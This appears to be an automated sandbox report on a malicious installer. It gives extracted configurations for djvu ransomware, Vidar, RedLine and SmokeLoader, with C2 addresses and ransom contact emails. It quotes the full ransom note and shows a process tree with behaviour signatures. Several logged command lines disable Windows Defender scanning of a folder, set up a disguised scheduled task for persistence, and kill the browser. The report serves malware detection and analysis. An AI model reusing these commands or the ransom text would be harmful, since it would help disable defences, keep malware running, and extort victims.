Resubmissions

23-09-2021 21:08

210923-zyzyaafbfr 10

22-09-2021 10:40

210922-mqyzssehck 10

22-09-2021 05:21

210922-f114ksecck 10

21-09-2021 05:29

210921-f6zspsgdg2 10

20-09-2021 21:51

210920-1qj3jafed9 10

20-09-2021 19:44

210920-yftswafca9 10

20-09-2021 08:28

210920-kczcasgahr 10

20-09-2021 04:42

210920-fb3acafedj 10

20-09-2021 04:42

210920-fb2zksfecr 10

Analysis

  • max time kernel
    1803s
  • max time network
    1806s
  • platform
    windows10_x64
  • resource
    win10-de-20210920
  • submitted
    20-09-2021 21:51

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.0MB

  • MD5

    73491325fde5366b31c09da701d07dd6

  • SHA1

    a4e1ada57e590c2df30fc26fad5f3ca57ad922b1

  • SHA256

    56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11

  • SHA512

    28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88

Malware Config

Extracted

Path

C:\_readme.txt

Family

djvu

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-vtoEIhR0SI Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: managerhelper@airmail.cc Your personal ID: 0334gSd743dfRiXRqq62TeogIfmpihYZJ6wDmuUVD07WwczX6Bm
Emails

manager@mailtemp.ch

managerhelper@airmail.cc

URLs

https://we.tl/t-vtoEIhR0SI

Extracted

Family

vidar

Version

40.7

Botnet

706

C2

https://petrenko96.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

janesam

C2

65.108.20.195:6774

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Signatures

  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies extensions of user files 4 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 44 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 41 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 44 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s SENS
    1⤵
      PID:1412
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
      1⤵
        PID:2384
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s BITS
        1⤵
        • Suspicious use of SetThreadContext
        PID:4688
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
            PID:5312
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
            • Drops file in System32 directory
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:6020
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2696
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
              PID:2676
              • C:\Windows\system32\wbem\WMIADAP.EXE
                wmiadap.exe /F /T /R
                2⤵
                  PID:7612
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                1⤵
                  PID:2548
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                  1⤵
                    PID:2404
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                    1⤵
                      PID:1860
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                      1⤵
                        PID:1392
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Themes
                        1⤵
                          PID:1176
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                          1⤵
                            PID:1160
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                            1⤵
                            • Drops file in System32 directory
                            PID:1064
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              2⤵
                              • Suspicious use of SetThreadContext
                              PID:7244
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                3⤵
                                  PID:4468
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                    4⤵
                                    • Creates scheduled task(s)
                                    PID:7228
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:7332
                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  3⤵
                                    PID:4640
                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  2⤵
                                  • Suspicious use of SetThreadContext
                                  PID:7376
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    3⤵
                                      PID:7004
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    2⤵
                                    • Suspicious use of SetThreadContext
                                    PID:6052
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      3⤵
                                        PID:4484
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      2⤵
                                      • Suspicious use of SetThreadContext
                                      PID:4672
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        3⤵
                                          PID:3120
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        2⤵
                                        • Suspicious use of SetThreadContext
                                        PID:7212
                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          3⤵
                                            PID:3848
                                        • C:\Users\Admin\AppData\Roaming\iwwbgde
                                          C:\Users\Admin\AppData\Roaming\iwwbgde
                                          2⤵
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: MapViewOfSection
                                          PID:1840
                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          2⤵
                                          • Suspicious use of SetThreadContext
                                          PID:7156
                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            3⤵
                                              PID:7512
                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            2⤵
                                            • Suspicious use of SetThreadContext
                                            PID:3792
                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                              3⤵
                                                PID:8060
                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                              2⤵
                                              • Suspicious use of SetThreadContext
                                              PID:6424
                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                3⤵
                                                  PID:6112
                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                2⤵
                                                • Suspicious use of SetThreadContext
                                                PID:5764
                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                  3⤵
                                                    PID:6872
                                                • C:\Users\Admin\AppData\Local\a8021ef6-78ab-4f1d-9fb3-bc7945c4d3ec\6A21.exe
                                                  C:\Users\Admin\AppData\Local\a8021ef6-78ab-4f1d-9fb3-bc7945c4d3ec\6A21.exe --Task
                                                  2⤵
                                                  • Suspicious use of SetThreadContext
                                                  PID:4320
                                                  • C:\Users\Admin\AppData\Local\a8021ef6-78ab-4f1d-9fb3-bc7945c4d3ec\6A21.exe
                                                    C:\Users\Admin\AppData\Local\a8021ef6-78ab-4f1d-9fb3-bc7945c4d3ec\6A21.exe --Task
                                                    3⤵
                                                      PID:7164
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    2⤵
                                                    • Suspicious use of SetThreadContext
                                                    PID:3580
                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      3⤵
                                                        PID:7488
                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      2⤵
                                                      • Suspicious use of SetThreadContext
                                                      PID:4572
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        3⤵
                                                          PID:4932
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        2⤵
                                                        • Suspicious use of SetThreadContext
                                                        PID:1800
                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          3⤵
                                                            PID:8168
                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          2⤵
                                                          • Suspicious use of SetThreadContext
                                                          PID:6736
                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            3⤵
                                                              PID:5696
                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            2⤵
                                                            • Suspicious use of SetThreadContext
                                                            PID:7876
                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              3⤵
                                                                PID:7148
                                                            • C:\Users\Admin\AppData\Local\a8021ef6-78ab-4f1d-9fb3-bc7945c4d3ec\6A21.exe
                                                              C:\Users\Admin\AppData\Local\a8021ef6-78ab-4f1d-9fb3-bc7945c4d3ec\6A21.exe --Task
                                                              2⤵
                                                              • Suspicious use of SetThreadContext
                                                              PID:6084
                                                              • C:\Users\Admin\AppData\Local\a8021ef6-78ab-4f1d-9fb3-bc7945c4d3ec\6A21.exe
                                                                C:\Users\Admin\AppData\Local\a8021ef6-78ab-4f1d-9fb3-bc7945c4d3ec\6A21.exe --Task
                                                                3⤵
                                                                  PID:6264
                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                2⤵
                                                                • Suspicious use of SetThreadContext
                                                                PID:4328
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  3⤵
                                                                    PID:1120
                                                                • C:\Users\Admin\AppData\Roaming\iwwbgde
                                                                  C:\Users\Admin\AppData\Roaming\iwwbgde
                                                                  2⤵
                                                                  • Checks SCSI registry key(s)
                                                                  • Suspicious behavior: MapViewOfSection
                                                                  PID:5288
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  2⤵
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:4856
                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    3⤵
                                                                      PID:4588
                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    2⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:3596
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      3⤵
                                                                        PID:3404
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      2⤵
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:7244
                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                        3⤵
                                                                          PID:5228
                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                        2⤵
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:5892
                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          3⤵
                                                                            PID:6120
                                                                        • C:\Users\Admin\AppData\Local\a8021ef6-78ab-4f1d-9fb3-bc7945c4d3ec\6A21.exe
                                                                          C:\Users\Admin\AppData\Local\a8021ef6-78ab-4f1d-9fb3-bc7945c4d3ec\6A21.exe --Task
                                                                          2⤵
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:2276
                                                                          • C:\Users\Admin\AppData\Local\a8021ef6-78ab-4f1d-9fb3-bc7945c4d3ec\6A21.exe
                                                                            C:\Users\Admin\AppData\Local\a8021ef6-78ab-4f1d-9fb3-bc7945c4d3ec\6A21.exe --Task
                                                                            3⤵
                                                                              PID:772
                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            2⤵
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:6280
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              3⤵
                                                                                PID:428
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              2⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:4472
                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                3⤵
                                                                                  PID:5376
                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                2⤵
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:7120
                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  3⤵
                                                                                    PID:6180
                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  2⤵
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:3792
                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    3⤵
                                                                                      PID:6760
                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    2⤵
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:6116
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      3⤵
                                                                                        PID:4452
                                                                                    • C:\Users\Admin\AppData\Local\a8021ef6-78ab-4f1d-9fb3-bc7945c4d3ec\6A21.exe
                                                                                      C:\Users\Admin\AppData\Local\a8021ef6-78ab-4f1d-9fb3-bc7945c4d3ec\6A21.exe --Task
                                                                                      2⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:6080
                                                                                      • C:\Users\Admin\AppData\Local\a8021ef6-78ab-4f1d-9fb3-bc7945c4d3ec\6A21.exe
                                                                                        C:\Users\Admin\AppData\Local\a8021ef6-78ab-4f1d-9fb3-bc7945c4d3ec\6A21.exe --Task
                                                                                        3⤵
                                                                                          PID:8076
                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        2⤵
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:5632
                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          3⤵
                                                                                            PID:6780
                                                                                        • C:\Users\Admin\AppData\Roaming\iwwbgde
                                                                                          C:\Users\Admin\AppData\Roaming\iwwbgde
                                                                                          2⤵
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:5244
                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          2⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:2612
                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                            3⤵
                                                                                              PID:5980
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                          1⤵
                                                                                            PID:396
                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                                                                                            1⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4144
                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:3364
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS42DD3692\setup_install.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\7zS42DD3692\setup_install.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:4268
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                                                  4⤵
                                                                                                    PID:4320
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                                                      5⤵
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1472
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe
                                                                                                    4⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4304
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS42DD3692\Sun1917b8fb5f09db8.exe
                                                                                                      Sun1917b8fb5f09db8.exe
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks computer location settings
                                                                                                      PID:4588
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe
                                                                                                    4⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4444
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS42DD3692\Sun19e4ade31b2a.exe
                                                                                                      Sun19e4ade31b2a.exe
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:3260
                                                                                                      • C:\Users\Admin\AppData\Roaming\6751839.scr
                                                                                                        "C:\Users\Admin\AppData\Roaming\6751839.scr" /S
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1952
                                                                                                      • C:\Users\Admin\AppData\Roaming\2660636.scr
                                                                                                        "C:\Users\Admin\AppData\Roaming\2660636.scr" /S
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:4380
                                                                                                      • C:\Users\Admin\AppData\Roaming\5478871.scr
                                                                                                        "C:\Users\Admin\AppData\Roaming\5478871.scr" /S
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:448
                                                                                                        • C:\Users\Admin\AppData\Roaming\5478871.scr
                                                                                                          "C:\Users\Admin\AppData\Roaming\5478871.scr"
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5412
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 448 -s 900
                                                                                                          7⤵
                                                                                                          • Program crash
                                                                                                          PID:5688
                                                                                                      • C:\Users\Admin\AppData\Roaming\2643799.scr
                                                                                                        "C:\Users\Admin\AppData\Roaming\2643799.scr" /S
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:5272
                                                                                                      • C:\Users\Admin\AppData\Roaming\8637821.scr
                                                                                                        "C:\Users\Admin\AppData\Roaming\8637821.scr" /S
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5360
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe
                                                                                                    4⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4388
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS42DD3692\Sun193fda712d9f1.exe
                                                                                                      Sun193fda712d9f1.exe
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4200
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe
                                                                                                    4⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4292
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS42DD3692\Sun19262b9e49ad.exe
                                                                                                      Sun19262b9e49ad.exe
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Modifies system certificate store
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:3120
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                        6⤵
                                                                                                          PID:1832
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill /f /im chrome.exe
                                                                                                            7⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:5292
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe
                                                                                                      4⤵
                                                                                                        PID:4460
